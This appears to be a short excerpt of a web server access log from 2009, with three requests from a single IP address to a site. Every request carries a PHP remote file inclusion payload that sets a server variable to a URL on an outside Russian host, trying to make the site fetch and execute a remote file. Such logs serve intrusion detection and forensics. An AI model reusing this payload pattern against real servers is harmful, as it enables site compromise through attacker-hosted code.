207.210.117.174 - - [06/Sep/2009:22:50:58 -0700] "GET /logs/access_090302.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
207.210.117.174 - - [06/Sep/2009:22:50:58 -0700] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 200 4950 "-" "Mozilla/5.0" "www.galf.org"
207.210.117.174 - - [06/Sep/2009:22:50:58 -0700] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 200 1050 "-" "Mozilla/5.0" "www.galf.org"
